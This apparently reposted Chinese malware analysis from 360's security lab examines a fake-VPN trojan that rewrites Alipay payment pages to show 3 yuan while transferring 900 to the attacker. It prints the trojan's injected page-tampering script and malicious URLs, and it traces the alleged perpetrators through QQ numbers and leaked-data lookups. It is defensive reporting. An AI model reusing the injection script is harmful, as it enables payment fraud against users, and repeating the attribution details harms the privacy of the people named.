记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

眼见未必实​之付款篡改支付宝木马分析

2016-05-20 18:35

眼见未必实​之付款篡改支付宝木马分析

2016-05-20 14:29:07 来源:360安全播报 作者:360天眼安全实验室
阅读:3043次 点赞(0) 收藏


分享到:

http://pic1.hackdig.com/pp/c3eab2e98ed566d0e41940afa978dad665e8a6e9d6595d43b7bf0a987cf3ce9b5e2acb422f91cda6de0d04e6f3cdd244.jpg

背景

人在做,天在看。

支付宝作为国内在线支付市场的老大饱受恶意代码的侵扰,黑产总在如何通过支付宝骗取钱财上发挥着聪明才智,所以相关的恶意代码一旦进入360天眼实验室的网络雷达屏幕就会立即触发响应。

熟悉网络安全、破解逆向的朋友一定对于52pojie这个网站不会感到陌生,它是我国为数不多的关注计算机安全的技术网站。本次事件发端于52pojie上的一篇名为“支付宝转3块扣1900,这是咋回事”的贴子,说了这样一个经历:楼主在网上买VPN代理想科学上网,用支付宝付款时显示3块钱,但输完支付宝验证码后却被扣了1900元。而这背后究竟发生了些什么请看360天眼实验室带来的分析。

过程分析

根据帖子中的描述,我们试着访问提及的网站hxxp://cctv168.cc/,而网友之所以找到这个网站,是通过搜索引擎搜索VPN的时候,进入钓鱼页面,然后网友下载该VPN而受骗,而现在搜索关键词“VPN”已经找不到这个站了。如图:

http://pic1.hackdig.com/pp/d2bd8ab8780efecdb70a25b22e968cee467249df1bd03128439edf42409b04b611f381eee7728491107ce015d5fcaef8.jpg

在浏览器中输入网址,回车后现在看到明确的恶意网站提示:

http://pic1.hackdig.com/pp/7c360a5426b1886df0a9cfdd6f628283bcc66f2fd396e575e8baa4dda303866105b50d60287727b199a5bb7431b44d49.jpg

我们当然忽略警告继续访问,背后的网站是这个样子:

http://pic1.hackdig.com/pp/4ae20cb14ac9d56f7929b4ff9e5d52721bf06e303b619327ee4c647f448bf1e9d0a14e21f958586795f34604346e24a1.jpg

点击“立即下载客户端”,所下载的文件现在已被360安全卫士查杀:

http://pic1.hackdig.com/pp/e9bc9757a3269a7bcd34a164302bda739cdf3bccbf22debc98f988d20407495dd63250e43a7faf34e40c155463d88d9c.jpg

帖子中的当事人很可能没能安装使用360卫士,不然几乎不可能在层层提示下还会一条道走到黑。现实是我们的可怜楼主可能真的就下载运行了恶意网站诱导的所谓VPN客户端程序,样本运行后,向用户展示界面如下界面:

http://pic1.hackdig.com/pp/4ae20cb14ac9d56f7929b4ff9e5d5272bea27990462fe847ae6f66be1c5efac241082005e583691b967a6c3f0f2743f5.jpg

当然,只是不管你在何时以何种姿势点击连接,都会提示您会员已经过期。没办法,只有点击购物车按钮,购买会员才能使用。

在购买界面,给出的应付金额是3元,在这个黄金周的旅游景区,上个厕所都比这个贵,所以分分钟就点击了同意开通。

http://pic1.hackdig.com/pp/7c360a5426b1886df0a9cfdd6f62828391eb8ae7c0a8ab09fcbed9009e8fdc888a44a32d0ef439419d829432c7405529.jpg

事实上点击了同意开通后,样本执行了如下不为用户所知的动作:

1.访问http://463038264.lofter.com网站,读取到包括每次转账的金额(这里为每次转900元)、转账时显示的支付宝姓名(这里为长江电子商务有限公司)以及支付宝账号(lrh103272@163.com)等配置信息。

http://pic1.hackdig.com/pp/214a8a6035b31e2495d6d890f5a69a03f681d7819c8ee75c3f6f3a14c0d01299025739bef13abc7adf46ed42d61dcbe0.jpg

2.带着http://www.alipay.com参数启动IEXPLORE.EXE,使用易语言(恶意代码作者的日常之选)封装的DOM类库,查找当前浏览器是不是正在进行付款操作。

http://pic1.hackdig.com/pp/d2bd8ab8780efecdb70a25b22e968cee1eacb4ba0f2f8d898f985c04c99b5d014abd01cb8bf8df71045fcbdb15147939.jpg

3.如果当前正在进行付款操作,根据付款的流程,修改网页的显示。

使用易语言的类成员方法(0x4040DB处),修改页面显示内容。此处方法有两个参数,参数一为“exescript”,参数二为要运行的脚本代码。将页面上显示的金额信息与付款金额填写为下图样式。至此,细心的人应该发现,软件能够帮你把金额和收款人自动填写上,当然也可以悄无声息地修改信息。

http://pic1.hackdig.com/pp/214a8a6035b31e2495d6d890f5a69a03191276ff897d05f789d8d0400a90d37fc53fe3e7cf6bf9f624a62c43c93288a5.jpg

参数二的脚本内容为:

seajs.use("jquery",function($)

{$('#reason').val('USERvpn111 MCZ2016254525');

$('#ipt-search-key').val('lrh103272@163.com');

vara1=$('#amount').clone();

$('#amount').css('display','none');

$('#amunt').val('900');a1.val('3');

a1.attr('id','amount1');

a1.removeAttr('name');

a1.insertAfter($('label[for="amount"]'));

}

);

http://pic1.hackdig.com/pp/2922be572a83b8a8c47e1e825dc54607ed855fe4d03774739e7009f29cbca886075eab9d768805a954af2db7c3ef7656.jpg

4.在上一步的操作中,支付宝实际支付的金额已经被修改成了900元,只不是因为软件作者通过脚本将显示的数字改成3元。在支付宝付款过程中,单击下一步后,正常的页面应该是这样的:

http://pic1.hackdig.com/pp/69703ce7a46d1e2ebe4a3bf5791266bf72f419adb4725ab121c4c95f77cfee78907dacdc16e4cb493f21562c328f8ac1.jpg

而在软件的帮忙下通过0x4046D6处函数的调用将页面做了瞒天过海式的修改:

一、将付款金额改成3元,

二、将收款人修改成"长江电子商务有限公司",在短短不到一秒钟的时间里,让人眼不见心不烦,提升了购物体验。

http://pic1.hackdig.com/pp/2922be572a83b8a8c47e1e825dc54607d62cc15320e7c028bf1c69904b45f24546b1e9d7a57442b3728a490e8dcd47a3.jpg

修改页面的代码:

http://pic1.hackdig.com/pp/2922be572a83b8a8c47e1e825dc54607d62cc15320e7c028bf1c69904b45f24546b1e9d7a57442b3728a490e8dcd47a3.jpg

5.在付款的最后一步,使用与第四步同样的障眼手法。被修改之前:

http://pic1.hackdig.com/pp/69703ce7a46d1e2ebe4a3bf5791266bf643cb6c8661118a91ac0c87990478425c187c13cd4da6091b5c6067c4fb505fa.jpg

http://pic1.hackdig.com/pp/2922be572a83b8a8c47e1e825dc54607056ea469abd01ff13c057e5072a7f125f625b7b37fa1875b00bcd38d1f18266e.jpg

修改后:

http://pic1.hackdig.com/pp/214a8a6035b31e2495d6d890f5a69a03e0fb36a6a7f80a95c37c6ebdff1c50884e41f462644a1b5985625229685194e9.jpg

6.最后,真实的交易数据被发送到服务器。事已至此,虽然肉眼已经无法再辨别出网页显示其实已经被篡改过,但从网络流量中发出的付款金额为900元。

http://pic1.hackdig.com/pp/c3eab2e98ed566d0e41940afa978dad6f16776be963f8b5078f8f726c60bad086b5ca795485b1c44e7880e8777795089.jpg

此时,看起来只支持了3元的一次完整购买过程就结束了。待事后事主看支付宝日志记录,才会发现转出的是900元,而不是3元。而这时,木马作者极可能正拿着这些钱吃着火锅唱着歌,还把着妹……

木马溯源

木马使用易语言编写,原理也并不复杂,技术方面没有太多值得细讲的地方。我们关心的是这种盗钱木马出自谁手?又经谁手进入网络?依赖360威胁情报中心的数据,追查其幕后黑手却也并不是什么难事,接着往下看。

样本中的配置文件来自于http://463038264.lofter.com网站,网页上出现了两个可疑的号码,463038264和2953766158,确认两个号码是QQ号。

http://pic1.hackdig.com/pp/69703ce7a46d1e2ebe4a3bf5791266bf4080a61449a49aede1eb8fab7f21e7fad41d35edb600b01bb4b452e79ab2a6e4.jpg

在QQ签名信息是“1元1000钻石充值地址:http://dwz.cn/34thJj (下载前关闭杀毒),活动仅限于4月9号晚12点,明天恢复正常价格!”,访问http://dwz.cn/34thJj,得到一批同源样本:

http://pic1.hackdig.com/pp/69703ce7a46d1e2ebe4a3bf5791266bf3182efe0e1012a033b55ebca843deee339a3443b8cf0502093bad6944e29a1a2.jpg

通过特征从360样本库中找到一些同源样本,发现木马作者有好多种骗钱的程序,整理后如图:

http://pic1.hackdig.com/pp/2922be572a83b8a8c47e1e825dc54607e1f8a602385ff4cb96868dbe312c14616d901fd8d65b424037f811601a51383f.jpg

通过对同源样本的挖掘和网上某社工库的查询,发现该团伙如下:牧马人A和开发人员B。

一、牧马人A:

牧马人A是实际操作诈骗的人。根据配置网页中提供的号码为2053766158,如图为该QQ的个人资料页:

http://pic1.hackdig.com/pp/214a8a6035b31e2495d6d890f5a69a03a57c985a3ae17526ca88cf313ea85c88256bb494fb371efefcb95320882f96e9.jpg

通过搜索该QQ号,可以确定这个QQ号属于木马使用者,这是网友李安在5月14日发的被诈骗的信息:

http://pic1.hackdig.com/pp/214a8a6035b31e2495d6d890f5a69a0356b969380f8d17eba9bf4cee96f6d5547528c298291e1ce587703ae8eccbe331.jpg

通过对该QQ和同源样本的挖掘找到了该QQ作者的大号:258****:

http://pic1.hackdig.com/pp/4ae20cb14ac9d56f7929b4ff9e5d52726d32af95243633ee5b33148f26d70ef552850f699e0ea8c5d06838c154e1f410.jpg

而且,还有一名徒弟的出场客串:

http://pic1.hackdig.com/pp/214a8a6035b31e2495d6d890f5a69a035f7d6809fe734f730d49a766d6b79eb082f6e3e7d505d6f7f7bcf1af2512a7af.jpg

该帅哥的价值观严重扭曲:

http://pic1.hackdig.com/pp/69703ce7a46d1e2ebe4a3bf5791266bf3209ce4ae7c54946a217cfa2491fe443c480bb4ceff319f095aa507a77e3761e.jpg

同时,通过样本又关联到该木马作者的两外要给另外一配置文件地址:

http://yanhuaxiang396.lofter.com/

http://pic1.hackdig.com/pp/97721f81cf192897d44977a79bcfea8a4649b06621d7b6be280f6e97bf735730d224433bc85acf3bf3a083dba7e81274.jpg

有深入挖掘,发现他们开了一家公司:扬州**电子商务有限公司,这公司当然做SEO非常牛逼,因为是电子商务公司,而A有可能是公司的一个员工,在干私活,通过学到的SEO技术去做优化,把自己的VPN钓鱼站拍到搜索引擎前面。

http://pic1.hackdig.com/pp/7c360a5426b1886df0a9cfdd6f6282837963ad975ffc20e5530e19874cf500c95476a95210106eaee3aa276c37e4f50f.jpg

二、开发人员B:

开发人员B是诈骗软件开发的人,同时还是一个定制开发易语言程序的,他的QQ为12077*****:

 

http://pic1.hackdig.com/pp/2922be572a83b8a8c47e1e825dc54607ccdac7bbc79189a5962405138964aced8a1de76f0d0d11a59727804a693fcc67.jpg

然后从QQ的个人说明中,找到了他家的店铺:

http://pic1.hackdig.com/pp/69703ce7a46d1e2ebe4a3bf5791266bf594c7f3e2fc436b2dfe0e88164461a32d014bbccf8b355b5a01209323c51a3b2.jpg

http://pic1.hackdig.com/pp/97721f81cf192897d44977a79bcfea8ad34a27992d6762063668dbc56f5b56a0f11a3da8cb4174c7dcd5d01b97396c5c.jpg

根据他阿里旺旺的信息,找到了另外的一个QQ:10092*****

http://pic1.hackdig.com/pp/69703ce7a46d1e2ebe4a3bf5791266bf4eac6378fd7de1d467f04d0a97e9356fd79064200e22a21dc4a9d9ce630adf5b.jpg

通过对该QQ小号的关联,发现了他的大号4470*****,从资料上看是一个从事互联网行业的人,吉林的,从群关系数据库可以看出他学习易语言和开发外挂已经很久了:

http://pic1.hackdig.com/pp/97721f81cf192897d44977a79bcfea8ab30f4e5a14632b17d87364284d2f2a2d4c72f6e6a712cc634e3740c4f0800fc2.jpg

通过查询群关系数据库,

http://pic1.hackdig.com/pp/caef4276da6ef4784d52dd7d3c29517ca0865d8c5a2a06bfa05a41d866542a6e62f809ad7a7936f8bd71a16555c80117.jpg

通过搜索引擎搜索该QQ,找到了作者的手机、邮箱和真名,如图:

http://pic1.hackdig.com/pp/7c360a5426b1886df0a9cfdd6f6282839a615552c0ae2b11621eb7dc20c2f0196bc574bca38663e525cfd75bf8f5ebb1.jpg

这是整个团伙的分工图:

http://pic1.hackdig.com/pp/c3eab2e98ed566d0e41940afa978dad6e1ca0471baf18d9e89af87bf937b963796bd125e5ac73c13ed6d015d4097d3ec.jpg

此外,作者充值业务广泛,包含但不限于以下业务:

http://pic1.hackdig.com/pp/2922be572a83b8a8c47e1e825dc5460709fc006f1c113eb2252a0b6f90f6ed6de75a3abdccef1a08e060f6783a91926f.jpg

http://pic1.hackdig.com/pp/97721f81cf192897d44977a79bcfea8a98668d489bcee6af5ac0f0f1c6bade5c6b069b16b581957fb0fb45cfbf580834.jpg

http://pic1.hackdig.com/pp/caef4276da6ef4784d52dd7d3c29517c61f73b7e4af50a6a8a3b6be2fb0e3e6c0554b1df463e5254f90f3fd17ed65cf4.jpg

http://pic1.hackdig.com/pp/caef4276da6ef4784d52dd7d3c29517c1174caa46e2a8833efb7683395de62cc376fe4521a1c436568bbd433b2205bf4.jpg

小结

木马作者使用的手段并不新奇,如果当时能够不轻信,如果当时能够不关杀软……但是没有如果。不夸张地说,现今的网络处处遍布陷井,保持安全软件的实时防护状态并及时安装漏洞补丁,才有可能在这魔鬼出没的世界中避免遭受欺诈和数字绑票。但是,武装到牙齿就够了吗?很多时候人总是带着侥幸的心理,人性的弱点最难以克服,no patch to stupid,再强大的安全工具在哪怕不那么高明的社工面前也往往一触即溃。控制好奇心,抵制贪婪,遏制恐惧,这些是一生的修行。

顺祝各位看官520表白成功!

本文由 360安全播报 原创发布,如需转载请注明来源及本文地址。
本文地址:http://www.hackdig.com/05/hack-35471.htm

知识来源: bobao.360.cn/learning/detail/2876.html

阅读:125130 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“眼见未必实​之付款篡改支付宝木马分析”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云